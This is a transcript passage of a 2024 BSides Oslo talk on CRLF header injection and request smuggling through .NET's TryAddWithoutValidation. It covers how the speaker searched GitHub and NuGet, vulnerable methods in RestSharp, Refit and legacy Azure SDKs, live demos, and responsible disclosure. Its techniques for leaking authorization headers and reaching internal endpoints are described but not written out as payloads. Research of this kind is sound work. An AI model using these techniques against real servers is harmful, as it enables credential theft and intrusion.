they'll include some kind of authorization. So let's say an authorization header in the HTTP requests. Now, me from the outside does not know the key that the internal services use to talk to each other, but if I go via the server which is planning on making this request, it will itself add the appropriate keys and I'll be able to talk to resources which I wouldn't necessarily be able to communicate with otherwise. If you're really lucky here, there's something internal which allows recording the request which came in. Let's say there's some kind of comment functionality. What I do is I go and split a request I'm making in such a way that all headers which would

be added by the server go into the body and then get put in a comment. Then I go and read the comment and I see, oh, cool, it's adding this authorization header, and I've leaked out the keys from the server.

Next, so I haven't really spoken about the limitations of this of request splitting, so I'm slightly limited in what hosts I can actually talk to because my request is going through the same HTTP connection as the previous one. Like, I'm not making two entirely separate requests, so I can't just go to, like, google.com. I have to speak to the same host as the first one. Same, like, physical, whatever. Doesn't matter. But if you have something internal which allows some kind of redirect, can combine that so you do your smuggled request goes to something which allows you to then redirect the resource you actually want, and you might be able to escalate this into basically a full server-side request forgery. So, hopefully, I've convinced you that

this is a real vulnerability. Now, let's forget about what you actually do with it and go back to the theoretical side. Not really. We're actually going to do something. But, okay, so here's the plan. Let's go and pick something really specific in code, so, like, in source code. allows CRLF injections, by which I mean let's go and pick some common pattern of vulnerable code, which people do. So if you can do CRLF injections, you can also do header injections and request splitting, as we just saw. I mean, you might be able to at least. And then what we're going to do is we're going to search through all open source repositories and packages and whatever

we find out in the world, and we're going to see, do we find lots of bugs? And then we are going to become famous, or speak it B-sides, or both. OK. So, from this point onwards, we have specialized to C-sharp, because why give yourself too broad of a scope, right? And the code you can see up on the screen here is actually the code which is used for the endpoint in my basic demo site, which you saw a little while ago. This isn't terribly interesting. It's just defining a URI it's going to talk to for the status endpoint. It's going to talk to it, and then it sends the status code back to the end user. interesting bit here is that if statement is kind

of around the middle, which is saying that if you've specified the name query parameter, I want to add this extra XCustomNameHeader. And how do we do that? We do it with a method named tryaddWithoutValidation. So what's happening here, you have a request object in C Sharp that has a headers object attached to it, and the way to add headers, there's various ways. One of them is by using this method, which takes a name and a value. So in this case the name of the header is the XCustomName header, and the value is ironically called name. I should probably have picked something else. And in a completely shocking turn of events, triad without validation does not do validation. That's not entirely true. It actually validates the name

properly. It's just the second parameter here. It's like, yeah, yeah, give me any control characters you want. I'll just kindly append it to my request. I might end up making multiple requests. I don't care. I'll just ship it out for you. That's all right. Conveniently, try add without validation is quite a long and it doesn't really roll off the tongue, so I don't expect if I go searching for this to find lots of false positives of other people implementing functions called try add without validation and then I have to filter out, they're like, oh, no, that's some custom function. Like, I expect it to 99% of the time be the real C-sharp function, like the .net library function I'm hitting. Okay, let's go searching.

GitHub. If you search on GitHub for string triad without validation, and you filter on C-sharp code, then there are roughly 20,000 hits. These are spread across 4,500 unique repositories. People do use this, shockingly. Initially, I didn't really understand why anyone would use this method, but that's another topic, I guess. Also, in the world of C-sharp and .NET, we have access to much more open source stuff, because if you have a binary, you can just trivially decompile it, essentially. Let's also go and have a look at public NuGet packages. For those not super familiar with C-sharp and .NET, NuGet is the main package manager. First of all, there's something like 700,000 publicly available NuGet packages. You are able to get some metadata and

stuff for them. A lot of these are old. This has existed for a while. So for 380,000 of them, you get updated metadata and stuff like download counts. And I figured anything which doesn't fall in this category will probably be... I don't need to look at that. So out of these, I sorted on number of downloads, and I looked at the 5,000 most popular public NuGet packages, downloaded each of them, decompiled them, and then did a string search for triad without validation. And out of these, there were 121 packages with hits. So I haven't written the number, but there's multiple hits per package here as well. So you end up with individual hits more than

that, but 121 unique packages. Also, there's quite a bit of overlap between these packages and the GitHub repos, because a lot of this is open source. Right. Out of this, I checked something like 80 GitHub repositories and all 121 Nougat hits for a total of 200 different code bases. That sounds worse than it is because a lot of these you can just immediately say, no, this isn't going to be vulnerable because it's just like hard-coded strings being input, for example. That's very easy to exclude. Okay. But you would hope that with all of these numbers, I do like numbers, we actually did find something interesting. Over to the results. these into various categories. The first one is a bit sad, or not that interesting, and that is command

line applications. So, we have the scenario where someone has written a command line application that takes some kind of command line arguments, and those arguments are somehow passed through and end up in triad without validation. So, that means if you, in the command line, give these control characters, then you'll end up doing, like, request splitting or whatever. The fundamental problem with this is that if I'm running a command line application on my machine, it's my machine I'm tricking to make the second request. I don't need to do that. I can just go to my browser and make the request I was planning on doing. This is not all that interesting. There is an asterisk on

that, which is Because someone else might have gone and written a web server, which takes some user input, and then on the back end, they go and call this command line application with my user controllable input from the web, and then suddenly I'm doing request splitting on the server again. Now, aside from the fact that that is painful to search for, I also figured that if you are in this scenario, you are probably able to do worse things like actual command injection. So this is not, like, the main area to look at. So I've kind of just discounted all of these and just said, yeah, not interesting. second even-sider category. So you'd think that by sorting both GitHub results and NuGet results on number of

downloads or number of forks, number of stars, whatever metric you have, you'd only be looking at interesting packages or repos. Turns out has a lot of ancient packages with a lot of downloads. So you can have packages which haven't been touched since 2016, which reach this top 5,000 download count, and are full of vulnerabilities. And it's like, OK, there's literally no one on the internet who uses this package anymore. It is fully deprecated and removed. So initially, I got really excited about a couple of results in this category, and then realized, damn, no one's ever going to use this. OK, moving on. And then we have something a bit more interesting. So, we have the category of APIs and libraries which expose vulnerable methods. So, what

I mean by that is I've gone and written some library or package which is going to help you do something else. And I have a public API, so I say use this method to do my thing. But under the covers, I take the input you give to my API, goes zoop, zoop, zoop, and ends up in triad without validation. So, now we've kind of got one step removed from triad without validation itself, and now it's my API which is vulnerable. With triad without validation itself, it's kind of obvious from the name that you aren't being validated, but if I have made something like an add header method, it's suddenly not so obvious anymore that you

are vulnerable. So we have two examples here. We have the package rest sharp and refit. So perhaps ironically, both of these are trying to do exactly the same thing, which is they are both libraries which are attempting to simplify interacting with rest APIs. a lot of packages doing this in .NET. I don't know if people really struggle with interacting with REST APIs or WhatsApp here, but okay, I won't judge. And then we have a final category, which is Microsoft and Azure SDKs. This is a bit painful because, well, first of all, anyone who's read Microsoft code, this is painful. Second of all, Depending on how your NuGet packaging is done, very often other NuGet packages will pull in some of these Azure and Microsoft libraries,

and then I'll get a bunch of false positives because you get hits for triad without validation in every single Microsoft SDK, and then it's pulled into every single package, and then you get much more hits than you should have got. So out of those 5,000 top packages where you had 121 hits, that is not actually the real number. That's probably like 20 real hits down. 100 of them is just Microsoft showing up again and again and again. Let's talk about REST sharp. So this is a screenshot from our own web page. In our own words, REST sharp is a simple REST and HTTP API client for .NET. We'll go and have a look at that documentation and see how am I supposed to add a header to a

request. So this is the documentation. Don't know if you can see it at the back, but essentially they give you three or four different ways to add a header to a request. And they have an example line here in the middle, says, so what you do is you make a rest request, define a path, and then you use this method called addHeader, which takes two arguments, a name and a value, and then that adds the header. Simple enough. Let's do a demo. So here is the code which is running in the next demo. I have another host running on my demo server, which has this getAsync endpoint, and what it does is it takes a query parameter named key, and puts it into this rest chart

method named addHeader. So the line with the second highlight here is essentially identical to the line from the documentation. Like, I haven't done something dumb on purpose here, other than putting user controllable input into it. So, let's see. We probably want that window. Let's clear it. And we want

So, here is my beautiful rest sharp example. It has this endpoint to check the server status. I messed up because it takes a key parameter. Let me just hang on. Okay. So, this code is doing the exact same thing as my other demo, just it's using the rest sharp library to do it instead of my own badly written C sharp code. So, looking at the requests coming in on the right-hand side here, we see I'm making a request to the server. get async endpoint, and then the server is making a secondary internal request to internal.site.slash.status.html, and it is including this custom header, xkey, with a name of hi, not a name, a value of hi. Okay, we

know what's going to happen. We are going to attempt CRLF injection. We are going to use exactly the same payloads as we had previously. So I'll just paste that in URL encoded, and for this case, so here's my initial request. Here's my second one. We have a key of Sophia. That should probably be something else, like key. And we have an injected header with a value of it works. Let me put that high up. Cool. Let's do the full request smuggling. Let's see if we have it here. Yep. So, again, I'm going to use the exact same example as we had previously. The payload is literally identical. And what do we end up with? up with the first request, the second intended request, and the

third smuggled request to admin.html. Okay. Now what's bad here is that there is no way in RESTCHARP to add a header to an HTTP call without being vulnerable to this. So there's, like, no safe header methods in this library. Now you can say that, you can argue that, like, just don't put malicious stuff into my API and I won't do bad things, which I can see that point. Initially when I found this, I was a bit like, what doesn't really do here? I haven't actually found any proper vulnerable uses of this. I did a bunch of searching on GitHub for other people then using REST sharps methods, found some new libraries which then are vulnerable, and I had to start searching for

does anyone use this library, and it all became very painful, and I didn't have a really clean example of here's someone who's vulnerable because of you guys. I did mention that I gave a similar talk at Sikkeretsfestivalen in August, slightly shorter than this one, where I showed this same demo, and then I figured, okay, now that I've spoken about this, I should probably actually report it, which I did. And then, ironically, it turns out they did take it seriously, so that got a CV. So I guess I accidentally dropped a zero day at my last talk. We'll see if there are any accidental zero days today. I think probably not, but we'll see. And they

also fixed it pretty much immediately, and it is fixed from REST chart version 112 onwards. Side note, what is going on with the REST chart versioning numbering? I don't know how you have 112 major versions. Yeah, so 111 and previous are vulnerable. And the demo was done in version 111. Let me just check the time. Okay. Let's have a look at refit as well. refit, in my own words, is an automatic type safe rest library for .NET Core, Xamarin, and .NET. Sounds very similar to the description of rest sharp, and indeed it's trying to solve the exact same problem. So I won't do a demo of this because it's pretty much identical, but I'll show you what the code would look like in the refit case. This

I also reported at the same time as rest sharp. They eventually got round to doing a fix which they pushed to the main branch. They haven't released it, but it's been there for like a month. I posted this comment two weeks ago on the GitHub security report thingy, whatever it's called. They haven't answered. I don't know if they plan on doing anything or if they plan on actually making a new release, but who knows. For the time being, don't use refit for anything critical, I guess. All right. Now, over something fun. Let's talk about Azure. So the Azure SDK, that is an Azure SDK for all the big programming languages. And the idea is to

help you when you are writing your code to interact with Azure resources and management and whatnot. In the .NET case, this is open source. I guess it is for most languages. And the repo is called Azure SDK for Net. Because this whole thing started with doing a code search, we are of course going to do a code search. No one has looked at Microsoft before, this repo is massive. There are 1,400 results for this term spread across 84 files. I did look at more results than this initially, but they were way quicker to look at because you have smaller code bases, you have a lot of false hits which are easy to exclude. Looking at any one of these is an absolute pain to

follow through and see what code actually ends up inside this method. I had to learn how to use better tools. Enter code QL. SQL is a semantic code analysis tool, which means that I guess you hook it into your build system, and it has actual knowledge of how your code actually works, what talks to what, what belongs together, that kind of thing. That's not a good explanation. But what's useful here is that it has a concept of sources, syncs, and flows. So what I mean by that is a source, in my case, will be basically any argument to a public method in a public class, a.k.a. a public API. And a sync is going to be the second argument to try add without validation, i.e. the thing

which is the value which is vulnerable to CRLF injection. This is my attempt at writing the code QL code for the sync. This is the first time I actually wrote any code QL, so this might be completely wrong, but it did do what it was supposed to do. And then the idea with flows here is that what code QL does for you is if you define the source and the sync, it will tell you all sources and syncs which link up together. It says, if you start with this argument in this API, it goes into this parameter, which is put into this function call, which defines this new attribute, which goes into this function call,

which ends up in triad without validation, second argument. Code QL is much better doing this than I am manually. What did we find? We found various things. First of all, there are 19 public methods, in the public API of the azure.net SDK, which take an argument named custom headers. Custom headers is what it sounds like. It's a dictionary mapping a header name to a list of header values, which are supposed to be added to some requests. There are also 10 public methods, which take an argument named ifmatch, which is put into a header of the same name. And six public methods, which take an argument named xmssnapshot, which is put into a header of the

same name. And unsurprisingly, because it is at this talk, all of these are vulnerable to CRLF injection. sounds pretty bad. It's like, what, 35 vulnerable methods? That doesn't sound great. So I figured, right, I'm going out on the internet, I'm going to find everyone is using this, and I'm going to just, like, hack everyone. We have lots of vulnerable APIs. No one uses any of these APIs. Nobody. So I haven't actually checked absolutely everything. You know, a slight asterisk there. What's going on here? So example, which is unclear if you can actually read. On the left-hand side is the code from the SDK repository. One of these vulnerable methods, which is named getimmutability policy with HTTP messages async, takes an argument named custom

headers, which is vulnerable. The code is on the left. On the right-hand side is the Google search for the name of this method with the quotes. That's exactly one hit on Google, which is the Microsoft Learn documentation for this method. No, there should be more hits because this is on GitHub, but I don't know how Google works, apparently. So if you actually click into this Microsoft Learn article, you realize that this is a part of the legacy API. And indeed, looking at a few more methods, they are all within the legacy API. Now, some of them seem to be more common than this one. I took the least useful one on purpose because I've learned from dropping zero days previously. You have to be a tiny bit

careful. If you go into the documentation, you see this Azure SDK for .NET legacy banner. But I still didn't quite understand what was going on here. In particular, what is up with these custom headers? Like, if I'm trying to, I don't know, I'm going to upload a file to my Azure container, when do you ever need custom headers? Like, what is the use case of this? So I tried to do a bit of Googling, and also I noticed that all the methods which took this custom headers argument had a name which was with HTTP messages async, which is a very specific kind of suffix. The first hit on Google for searching just what is with HTTP messages async is someone asking my exact

question on the repository I'm looking at. This issue has been closed. That was not a satisfactory explanation in that, so I still didn't quite understand what was going on. Further searching, there's a bunch of like Stack Exchange, Stack Overflow things where people ask basically the same question. don't know if you can, you definitely can't read that one, but here someone is asking for specifically the Microsoft Azure face API. They are saying there is a method named get async and a message named get with HTTP messages async. Why do both exist and what is going on? No good answers. Searching a bit more, and eventually things pointed me to this second repository named auto rest. So

the auto rest repository also lives in the Azure organization on GitHub, and actually, bit closer at the SDK repository, what's happened here is that all of the vulnerable code I found has been generated by this author rest tool. The author rest tool goes and gets the rest specification from yet a third library, repository I'm in, and then it goes and generates it and checks it out to the SDK library. So my hypothesis here was, oh, right, so it's the author rest thing which is generating vulnerable methods. looked in that repository, I found some example output which had triad without validation, which was vulnerable. I'm like, oh, yes, nice, I'm getting it. I rerun, generate that same example, and it's not vulnerable. So what's happened is there's an older version

of authorest which generates vulnerable code. It does not do it anymore. It has generated a bunch of vulnerable Azure methods in the past, but it's probably not doing it anymore. So all of this amounts to I don't know what. Right. Depending on how we are for time, how are we for time? Okay, then I'll do one more demo here at the end. Now I've gone and picked another really obscure method so I don't do anything bad here live. There's a method named Microsoft Azure management storage blob container operation extensions get immutability policy async. So if you're using that in your code base, watch out. Here's documentation from Microsoft. This takes this parameter you can't see at the back, but it takes a parameter named

ifmatch, and if match is vulnerable to CRLF injection. So I prepared this demo yesterday evening at about 11pm. So we'll see how understandable this actually is. I have opened burp here and put the font size to 24 so that you can read the requests, hopefully. That request wasn't interesting. I realised I didn't actually show you the code. So here is what we are doing. I went to chat GPT and I said make me some example code which uses super long method. It made me some code, and I changed it around so that I have a command line application which takes one argument. And this argument it puts into the if match value of this call to get immutability policy

async. So that's all we've got. So let's see. We've got this get immutability policy async.exe on the right-hand side. I'm going to pass it a value of hello b-sides. It's going to crash because it's a live demo. Let's find out. No, it didn't. Okay. Cool. Let's go, I'm sending this through a proxy because I didn't have time to think of a better way to view the request. So on the left-hand side here, you can see the request it's making to this beautiful endpoint in Azure. And here we can see the if match header has my value hello bsites. Okay, you all know what's going to happen. Let's try to inject a header. Side note, to

put CRLF characters into PowerShell, you have to do that funny backslash r, no, not backslash, back tick r thingy. seen that before. I had to Google it. Let's see what request we made. We made the if match header with hello B-sides. We have an injected header. All right. We'll do the third one. Let's see if we get to smuggle a whole request. This is going to look weird in my proxy here because it's all going through the same connection. But we have a first request which is properly terminated and we have a second smuggled request. I It's rolled just fine off down that I haven't leaked my whole barry token, but have shown you that the authorization header ends up in the second request, which potentially makes this pretty

nice, actually, because I can go and interact with any Azure resource I want, and this code is going to give me the proper authorization headers for that. Now, this is running client-side, so this is the dumb vulnerability I spoke about initially. The idea here is, imagine someone had this code in that server, not me on my machine. All right. Do we have anything more? We have some conclusions. Excellent. Starting this project, I was hoping that what I would find is a bunch of vulnerable, I don't know, reverse proxies or load balances or whatever, where I can just show you nicely in a web view, like, hey, I go to this page, and this endpoint is

vulnerable to CRLF injection, and it exists in the wild. What I found in reality was some library that uses some library that uses a vulnerable method. And it's kind of all my examples on my own code, which is a bit sad. But I mean, it's still real vulnerabilities, obviously. In fact, there's a CVE, so it's very much real. The main thing to learn here is just be very careful with user-controllable input. This you already knew if you are here. But in the case of, for example, REST sharp, like I was saying initially, if I'm calling triad without validation, I'm not very surprised when there's no validation. But when I'm calling REST sharp's add header method,

and there's nothing in the documentation about any CRLFs or security or whatever, it doesn't necessarily occur to me that I need to be extra careful. you put this a couple of layers out, like you have a library which uses that again and a library which uses that again, then it's beginning to be really not obvious that this would be vulnerable. So just always be extra careful, especially if you don't know what the library is doing. We got a CVE, so that's cool, and that's fixed. We got a fix in refit, which may or may not be released. Who knows about Azure? Probably should actually be looking at this author rest and Azure rest API specs

repositories. We'll see if I ever have the to do that. And that's it. Thank you very much.

Thank you. Do we have any questions for Sophia? Why couldn't you save the O-day for us? Maybe next year. Maybe next year. Just kidding. We support responsible disclosure. Maybe get Immutability Positasync gets a CV.

What led you down this to focus on this area? At binary security, we have a markdown document called research.md. Someone had pasted in that document, check out, try ad without validation. It's vulnerable to CRLF injection. And I ran with it. Fair enough. I kind of had the impression that the HTTP response injection stuff was like, I remember hearing about that a long time ago and I was like, that's old school stuff. Now we have to worry about the V8 type confusion and map confusion. But it seems like even though we get the new vulnerabilities, the old ones are still kind of there. Oh yes.

Well, thank you very much. Are you here for the rest of the event? Fantastic. Thank you so much. Sophia, let's have a big round of applause.

That's a break. That is a wrap for the stream as well. So for anybody joining us online, thank you so much. Hope you enjoyed it. And please feel free to join us in person next time.

BSides Oslo 2024

Related talks